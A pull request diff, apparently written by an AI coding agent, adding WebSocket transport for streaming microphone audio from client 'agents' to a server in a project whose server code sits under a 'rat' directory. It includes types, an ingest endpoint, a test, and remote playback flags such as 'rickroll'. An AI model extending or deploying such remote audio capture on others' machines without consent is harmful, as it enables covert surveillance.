### PR TITLE
Add binary audio streaming transport over WebSocket

### DIFF
--- a/shared/constants/protocol.ts
+++ b/shared/constants/protocol.ts
@@ -1,3 +1,5 @@
 export const COMMAND_STREAM_SUBPROTOCOL = "tenvy.agent.v1";
 export const COMMAND_STREAM_MAX_MESSAGE_BYTES = 1_048_576; // 1 MiB
-export const AGENT_SESSION_TOKEN_HEADER = 'x-agent-session-token';
+export const AGENT_SESSION_TOKEN_HEADER = "x-agent-session-token";
+export const AUDIO_STREAM_SUBPROTOCOL = "tenvy.audio.v1";
+export const AUDIO_STREAM_TOKEN_HEADER = "x-audio-stream-token";

--- a/shared/types/audio.ts
+++ b/shared/types/audio.ts
@@ -1,114 +1,125 @@
-export type AudioDirection = 'input' | 'output';
+export type AudioDirection = "input" | "output";
 
-export type AudioStreamEncoding = 'pcm16';
+export type AudioStreamEncoding = "pcm16";
+
+export type AudioStreamTransportType = "http-chunk" | "websocket";
+
+export interface AudioStreamTransport {
+  transport: AudioStreamTransportType;
+  url: string;
+  protocol?: string;
+  headers?: Record<string, string>;
+}
 
 export interface AudioDeviceDescriptor {
-        id: string;
-        deviceId: string;
-        label: string;
-        kind: AudioDirection;
-        groupId?: string;
-        systemDefault?: boolean;
-        communicationsDefault?: boolean;
-        lastSeen: string;
+  id: string;
+  deviceId: string;
+  label: string;
+  kind: AudioDirection;
+  groupId?: string;
+  systemDefault?: boolean;
+  communicationsDefault?: boolean;
+  lastSeen: string;
 }
 
 export interface AudioDeviceInventory {
-        inputs: AudioDeviceDescriptor[];
-        outputs: AudioDeviceDescriptor[];
-        capturedAt: string;
-        requestId?: string;
+  inputs: AudioDeviceDescriptor[];
+  outputs: AudioDeviceDescriptor[];
+  capturedAt: string;
+  requestId?: string;
 }
 
 export interface AudioDeviceInventoryState {
-        inventory?: AudioDeviceInventory | null;
-        pending?: boolean;
+  inventory?: AudioDeviceInventory | null;
+  pending?: boolean;
 }
 
 export interface AudioDeviceRefreshResponse {
-        requestId: string;
+  requestId: string;
 }
 
 export interface AudioStreamFormat {
-        encoding: AudioStreamEncoding;
-        sampleRate: number;
-        channels: number;
+  encoding: AudioStreamEncoding;
+  sampleRate: number;
+  channels: number;
 }
 
 export interface AudioStreamChunk {
-        sessionId: string;
-        sequence: number;
-        timestamp: string;
-        format: AudioStreamFormat;
-        data: string;
+  sessionId: string;
+  sequence: number;
+  timestamp: string;
+  format: AudioStreamFormat;
+  data: string;
 }
 
 export interface AudioSessionState {
-        sessionId: string;
-        agentId: string;
-        deviceId?: string;
-        deviceLabel?: string;
-        direction: AudioDirection;
-        format: AudioStreamFormat;
-        startedAt: string;
-        lastUpdatedAt?: string;
-        active: boolean;
-        lastSequence?: number;
+  sessionId: string;
+  agentId: string;
+  deviceId?: string;
+  deviceLabel?: string;
+  direction: AudioDirection;
+  format: AudioStreamFormat;
+  startedAt: string;
+  lastUpdatedAt?: string;
+  active: boolean;
+  lastSequence?: number;
+  transport?: AudioStreamTransport;
 }
 
 export interface AudioSessionResponse {
-        session: AudioSessionState | null;
+  session: AudioSessionState | null;
 }
 
 export interface AudioSessionRequest {
-        deviceId?: string;
-        deviceLabel?: string;
-        direction?: AudioDirection;
-        sampleRate?: number;
-        channels?: number;
-        encoding?: AudioStreamEncoding;
+  deviceId?: string;
+  deviceLabel?: string;
+  direction?: AudioDirection;
+  sampleRate?: number;
+  channels?: number;
+  encoding?: AudioStreamEncoding;
 }
 
 export type AudioControlAction =
-        | 'enumerate'
-        | 'inventory'
-        | 'start'
-        | 'stop'
-        | 'playback-start'
-        | 'playback-pause'
-        | 'playback-resume'
-        | 'playback-stop';
+  | "enumerate"
+  | "inventory"
+  | "start"
+  | "stop"
+  | "playback-start"
+  | "playback-pause"
+  | "playback-resume"
+  | "playback-stop";
 
 export interface AudioControlCommandPayload {
-        action: AudioControlAction;
-        requestId?: string;
-        sessionId?: string;
-        deviceId?: string;
-        deviceLabel?: string;
-        direction?: AudioDirection;
-        sampleRate?: number;
-        channels?: number;
-        encoding?: AudioStreamEncoding;
-        trackId?: string;
-        trackUrl?: string;
-        outputDeviceId?: string;
-        outputDeviceLabel?: string;
-        volume?: number;
-        loop?: boolean;
-        chaosMode?: boolean;
-        rickroll?: boolean;
+  action: AudioControlAction;
+  requestId?: string;
+  sessionId?: string;
+  deviceId?: string;
+  deviceLabel?: string;
+  direction?: AudioDirection;
+  sampleRate?: number;
+  channels?: number;
+  encoding?: AudioStreamEncoding;
+  streamTransport?: AudioStreamTransport;
+  trackId?: string;
+  trackUrl?: string;
+  outputDeviceId?: string;
+  outputDeviceLabel?: string;
+  volume?: number;
+  loop?: boolean;
+  chaosMode?: boolean;
+  rickroll?: boolean;
 }
 
 export interface AudioUploadTrack {
-        id: string;
-        filename: string;
-        originalName: string;
-        size: number;
-        contentType?: string;
-        uploadedAt: string;
-        downloadUrl: string;
+  id: string;
+  filename: string;
+  originalName: string;
+  size: number;
+  contentType?: string;
+  uploadedAt: string;
+  downloadUrl: string;
 }
 
 export interface AudioUploadResponse {
-        uploads: AudioUploadTrack[];
+  uploads: AudioUploadTrack[];
 }

--- a/tenvy-client/internal/modules/control/audio/types.go
+++ b/tenvy-client/internal/modules/control/audio/types.go
@@ -33,6 +33,13 @@ type AudioStreamFormat struct {
 	Channels   int    `json:"channels"`
 }
 
+type AudioStreamTransport struct {
+	Transport string            `json:"transport"`
+	URL       string            `json:"url"`
+	Protocol  string            `json:"protocol,omitempty"`
+	Headers   map[string]string `json:"headers,omitempty"`
+}
+
 type AudioStreamChunk struct {
 	SessionID string            `json:"sessionId"`
 	Sequence  uint64            `json:"sequence"`
@@ -42,15 +49,16 @@ type AudioStreamChunk struct {
 }
 
 type AudioControlCommandPayload struct {
-	Action      string         `json:"action"`
-	RequestID   string         `json:"requestId,omitempty"`
-	SessionID   string         `json:"sessionId,omitempty"`
-	DeviceID    string         `json:"deviceId,omitempty"`
-	DeviceLabel string         `json:"deviceLabel,omitempty"`
-	Direction   AudioDirection `json:"direction,omitempty"`
-	SampleRate  int            `json:"sampleRate,omitempty"`
-	Channels    int            `json:"channels,omitempty"`
-	Encoding    string         `json:"encoding,omitempty"`
+	Action          string                `json:"action"`
+	RequestID       string                `json:"requestId,omitempty"`
+	SessionID       string                `json:"sessionId,omitempty"`
+	DeviceID        string                `json:"deviceId,omitempty"`
+	DeviceLabel     string                `json:"deviceLabel,omitempty"`
+	Direction       AudioDirection        `json:"direction,omitempty"`
+	SampleRate      int                   `json:"sampleRate,omitempty"`
+	Channels        int                   `json:"channels,omitempty"`
+	Encoding        string                `json:"encoding,omitempty"`
+	StreamTransport *AudioStreamTransport `json:"streamTransport,omitempty"`
 }
 
 type AudioDiagnosticResult struct {

--- a/tenvy-client/internal/protocol/types.go
+++ b/tenvy-client/internal/protocol/types.go
@@ -10,26 +10,28 @@ import (
 const (
 	CommandStreamSubprotocol    = "tenvy.agent.v1"
 	CommandStreamMaxMessageSize = 1 << 20 // 1 MiB
+	AudioStreamSubprotocol      = "tenvy.audio.v1"
+	AudioStreamTokenHeader      = "X-Audio-Stream-Token"
 )
 
 var ErrUnauthorized = errors.New("unauthorized")
 
 type PluginSignaturePolicy struct {
-        AllowUnsigned     bool              `json:"allowUnsigned,omitempty"`
-        SHA256AllowList   []string          `json:"sha256AllowList,omitempty"`
-        Ed25519PublicKeys map[string]string `json:"ed25519PublicKeys,omitempty"`
-        MaxSignatureAgeMs int64             `json:"maxSignatureAgeMs,omitempty"`
+	AllowUnsigned     bool              `json:"allowUnsigned,omitempty"`
+	SHA256AllowList   []string          `json:"sha256AllowList,omitempty"`
+	Ed25519PublicKeys map[string]string `json:"ed25519PublicKeys,omitempty"`
+	MaxSignatureAgeMs int64             `json:"maxSignatureAgeMs,omitempty"`
 }
 
 type PluginConfig struct {
-        SignaturePolicy *PluginSignaturePolicy `json:"signaturePolicy,omitempty"`
+	SignaturePolicy *PluginSignaturePolicy `json:"signaturePolicy,omitempty"`
 }
 
 type AgentConfig struct {
-        PollIntervalMs int           `json:"pollIntervalMs"`
-        MaxBackoffMs   int           `json:"maxBackoffMs"`
-        JitterRatio    float64       `json:"jitterRatio"`
-        Plugins        *PluginConfig `json:"plugins,omitempty"`
+	PollIntervalMs int           `json:"pollIntervalMs"`
+	MaxBackoffMs   int           `json:"maxBackoffMs"`
+	JitterRatio    float64       `json:"jitterRatio"`
+	Plugins        *PluginConfig `json:"plugins,omitempty"`
 }
 
 type AgentMetrics struct {

--- a/tenvy-server/src/lib/server/rat/audio.test.ts
+++ b/tenvy-server/src/lib/server/rat/audio.test.ts
@@ -1,0 +1,154 @@
+import { describe, expect, it, beforeEach } from 'vitest';
+import { AudioBridgeManager } from './audio';
+import { AUDIO_STREAM_TOKEN_HEADER } from '../../../../../shared/constants/protocol';
+
+class MockWebSocket {
+	readyState = 1;
+	protocol: string | null = null;
+	closed = false;
+	private listeners = new Map<string, Set<(event?: unknown) => void>>();
+
+	accept(options?: { protocol?: string }) {
+		this.protocol = options?.protocol ?? null;
+	}
+
+	close(code?: number, reason?: string) {
+		void code;
+		void reason;
+		if (this.closed) {
+			return;
+		}
+		this.closed = true;
+		this.readyState = 3;
+		this.emit('close');
+	}
+
+	addEventListener(type: string, listener: (event?: unknown) => void) {
+		if (!this.listeners.has(type)) {
+			this.listeners.set(type, new Set());
+		}
+		this.listeners.get(type)!.add(listener);
+	}
+
+	emit(type: string, event?: unknown) {
+		const listeners = this.listeners.get(type);
+		if (!listeners) {
+			return;
+		}
+		for (const listener of listeners) {
+			listener(event);
+		}
+	}
+
+	emitMessage(data: ArrayBuffer | Buffer | Uint8Array) {
+		const event = { data } as { data: unknown };
+		this.emit('message', event);
+	}
+}
+
+const decoder = new TextDecoder();
+
+function buildFrame(header: Record<string, unknown>, payload: Uint8Array): Buffer {
+	const headerJson = Buffer.from(JSON.stringify(header), 'utf-8');
+	const newline = Buffer.from('\n', 'utf-8');
+	return Buffer.concat([headerJson, newline, Buffer.from(payload)]);
+}
+
+function parseSseChunk(chunk: Uint8Array): { event: string; data: unknown } {
+	const text = decoder.decode(chunk);
+	const lines = text.trim().split('\n');
+	const eventLine = lines.find((line) => line.startsWith('event: '));
+	const dataLine = lines.find((line) => line.startsWith('data: '));
+	if (!eventLine || !dataLine) {
+		throw new Error(`Malformed SSE chunk: ${text}`);
+	}
+	const event = eventLine.slice('event: '.length).trim();
+	const data = JSON.parse(dataLine.slice('data: '.length));
+	return { event, data };
+}
+
+describe('AudioBridgeManager binary transport', () => {
+	let manager: AudioBridgeManager;
+
+	beforeEach(() => {
+		manager = new AudioBridgeManager();
+	});
+
+	it('streams audio frames over the binary transport and survives reconnection', async () => {
+		const session = manager.createSession('agent-1', {
+			direction: 'input',
+			format: { encoding: 'pcm16', sampleRate: 48_000, channels: 1 }
+		});
+
+		const prepared = manager.prepareBinaryTransport('agent-1', session.sessionId);
+		const token = prepared.command.headers?.[AUDIO_STREAM_TOKEN_HEADER];
+		expect(token).toBeTruthy();
+
+		const socket = new MockWebSocket();
+		manager.attachBinaryStream(
+			'agent-1',
+			session.sessionId,
+			token!,
+			socket as unknown as WebSocket
+		);
+
+		const stream = manager.subscribe('agent-1', session.sessionId);
+		const reader = stream.getReader();
+
+		// initial session event
+		await reader.read();
+
+		const payload = new Uint8Array([0x00, 0x10, 0x7f, 0xff]);
+		const frame = buildFrame(
+			{
+				sessionId: session.sessionId,
+				sequence: 1,
+				timestamp: new Date().toISOString(),
+				format: { encoding: 'pcm16', sampleRate: 48_000, channels: 1 }
+			},
+			payload
+		);
+		socket.emitMessage(frame);
+
+		const firstChunk = await reader.read();
+		expect(firstChunk.done).toBe(false);
+		const parsedFirst = parseSseChunk(firstChunk.value!);
+		expect(parsedFirst.event).toBe('chunk');
+		const firstData = parsedFirst.data as { sequence: number; data: string };
+		expect(firstData.sequence).toBe(1);
+		expect(firstData.data).toBe(Buffer.from(payload).toString('base64'));
+
+		socket.emit('close');
+
+		const nextSocket = new MockWebSocket();
+		manager.attachBinaryStream(
+			'agent-1',
+			session.sessionId,
+			token!,
+			nextSocket as unknown as WebSocket
+		);
+
+		const secondPayload = new Uint8Array([0xaa, 0xbb, 0xcc, 0xdd]);
+		const secondFrame = buildFrame(
+			{
+				sessionId: session.sessionId,
+				sequence: 2,
+				timestamp: new Date().toISOString(),
+				format: { encoding: 'pcm16', sampleRate: 48_000, channels: 1 }
+			},
+			secondPayload
+		);
+		nextSocket.emitMessage(secondFrame);
+
+		const secondChunk = await reader.read();
+		expect(secondChunk.done).toBe(false);
+		const parsedSecond = parseSseChunk(secondChunk.value!);
+		expect(parsedSecond.event).toBe('chunk');
+		const secondData = parsedSecond.data as { sequence: number; data: string };
+		expect(secondData.sequence).toBe(2);
+		expect(secondData.data).toBe(Buffer.from(secondPayload).toString('base64'));
+
+		const finalState = manager.getSessionState('agent-1');
+		expect(finalState?.lastSequence).toBe(2);
+	});
+});

--- a/tenvy-server/src/routes/api/agents/[id]/audio/ingest/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/audio/ingest/+server.ts
@@ -1,0 +1,58 @@
+import { error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { audioBridgeManager, AudioBridgeError } from '$lib/server/rat/audio';
+import { AUDIO_STREAM_TOKEN_HEADER } from '../../../../../../../shared/constants/protocol';
+
+export const GET: RequestHandler = ({ request, params }) => {
+	if (request.headers.get('upgrade')?.toLowerCase() !== 'websocket') {
+		throw error(400, 'Expected WebSocket upgrade request');
+	}
+
+	const id = params.id;
+	if (!id) {
+		throw error(400, 'Missing agent identifier');
+	}
+
+	const url = new URL(request.url);
+	if (url.protocol !== 'https:') {
+		throw error(400, 'Secure transport required');
+	}
+
+	const sessionId = url.searchParams.get('sessionId');
+	if (!sessionId) {
+		throw error(400, 'Missing session identifier');
+	}
+
+	const token = request.headers.get(AUDIO_STREAM_TOKEN_HEADER);
+	if (!token) {
+		throw error(401, 'Missing audio stream token');
+	}
+
+	const pairFactory = (
+		globalThis as {
+			WebSocketPair?: new () => { 0: WebSocket; 1: WebSocket };
+		}
+	).WebSocketPair;
+
+	if (!pairFactory) {
+		throw error(503, 'WebSocket upgrade not supported');
+	}
+
+	const { 0: client, 1: serverSocket } = new pairFactory();
+
+	try {
+		audioBridgeManager.attachBinaryStream(id, sessionId, token, serverSocket);
+	} catch (err) {
+		try {
+			serverSocket.close(1011, 'Audio stream rejected');
+		} catch {
+			// ignore close errors
+		}
+		if (err instanceof AudioBridgeError) {
+			throw error(err.status, err.message);
+		}
+		throw error(500, 'Failed to attach audio stream');
+	}
+
+	return new Response(null, { status: 101, webSocket: client } as unknown as ResponseInit);
+};


### PR DESCRIPTION
## Summary
- add shared protocol constants and audio transport schema for websocket ingest
- update the Go audio bridge to negotiate websocket streaming, retry on failures, and fall back to chunked HTTP when needed
- expose a websocket ingest endpoint and controller-side handling, including tests for sequence preservation across reconnects

## Testing
- bunx vitest run src/lib/server/rat/audio.test.ts

------
https://chatgpt.com/codex/tasks/task_e_68f79d3e8944832bbc2be3e94430dfdc